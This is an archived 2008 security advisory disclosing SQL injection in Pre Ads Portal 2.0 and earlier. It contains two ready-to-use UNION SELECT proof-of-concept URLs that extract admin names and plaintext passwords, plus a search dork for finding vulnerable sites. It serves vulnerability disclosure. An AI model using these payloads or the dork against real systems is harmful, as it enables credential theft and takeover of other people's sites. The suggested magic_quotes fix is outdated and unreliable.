TUCoPS :: Web :: CMS / Portals

TUCoPS :: Web :: CMS / Portals :: bx3518.htm
Pre Ads Portal <= 2.0 Sql Injection Vulnerability
Pre Ads Portal <= 2.0 Sql Injection Vulnerability Pre Ads Portal <= 2.0 Sql Injection Vulnerability

ECHO_ADV_98$2008=0D
=0D
-----------------------------------------------------------------------------------------=0D
[ECHO_ADV_98$2008] Pre Ads Portal <= 2.0 Sql Injection Vulnerability=0D
-----------------------------------------------------------------------------------------=0D
=0D
Author         : M.Hasran Addahroni=0D
Date           : June, 13 th 2008=0D
Location       : Jakarta, Indonesia=0D
Web : http://e-rdc.org/v1/news.php?readmore=98=0D 
Critical Lvl   : Medium=0D
Impact	       : System access=0D
Where	       : From Remote=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Application : Pre Ads Portal=0D
version : <= 2.0=0D
Vendor : http://www.preproject.com/ads.asp=0D 
Description :=0D
=0D
Pre ADS Portal is a Web Application which is used to submit your personal=0D
listings into different categories. You can add your's Listings into the=0D
following categories or can also add, edit and delete categories and=0D
sub categories from admin section. Pre ADS Portal fully customizable website=0D
for ads submission solution with golden and featured listings features.=0D
=0D
During submission users can make their ads golden or featured listed and=0D
webmaster can add packages for monthly payments against these features.=0D
2Checkout and PAYPAL have been integrated to this portal system. We have tried=0D
to make script completely resembles to Businessesforsale.com, hotscripts.com=0D
and mostly advanced classifieds websites. Blows are the main features or a=0D
kind of manual of our Pre ADS Portal.=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~=0D
=0D
Input passed to the "cid" parameter in showcategory.php page and "id" parameter=0D
in software-description.php are not properly verified before being used to sql query.=0D
This can be exploited thru the browser and get password from admin in plain text.=0D
Successful exploitation requires that "magic_quotes" is off.=0D
=0D
=0D
Poc/Exploit:=0D
~~~~~~~~~~=0D
=0D
http://[URL]/[path]/showcategory.php?cid=-1%20union%20select%201,concat\=0D 
(id,0x3a,admin_name,0x3a,pwd),3,4,5,6%20from%20sbwmd_admin--=0D
=0D
http://[URL]/[path]/software-description.php?id=-1%20union%20select%201,2,concat\=0D 
(id,0x3a,admin_name,0x3a,pwd),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20\=0D
from%20sbwmd_admin--=0D
=0D
Dork:=0D
~~~~~=0D
altavista : "home | login | register | feedback | link to us | submit Listing | advertise"=0D
=0D
=0D
Solution:=0D
~~~~~~~=0D
=0D
- Edit the source code to ensure that input is properly verified.=0D
- Turn on magic_quotes in php.ini=0D
=0D
=0D
Timeline:=0D
~~~~~~~~~=0D
=0D
- 10 - 06 - 2008 bug found=0D
- 13 - 06 - 2008 vendor contacted=0D
- 13 - 06 - 2008 advisory released=0D
---------------------------------------------------------------------------=0D
=0D
Shoutz:=0D
~~~~~=0D
~ ping - my dearest wife, zautha my little warrior "happy birthday, dear"=0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,=0D
the_hydra,neng chika, str0ke=0D
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES=0D
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,=0D
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b=0D
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,=0D
kuntua, stev_manado,nofry,k1tk4t,0pt1c=0D
~ newbie_hacker@yahoogroups.com=0D 
~ #aikmel #e-c-h-o @irc.dal.net=0D 
=0D
---------------------------------------------------------------------------=0D
Contact:=0D
~~~~~~=0D
=0D
K-159 || echo|staff || eufrato[at]gmail[dot]com=0D
Homepage: http://www.e-rdc.org/=0D 
=0D
-------------------------------- [ EOF ] ----------------------------------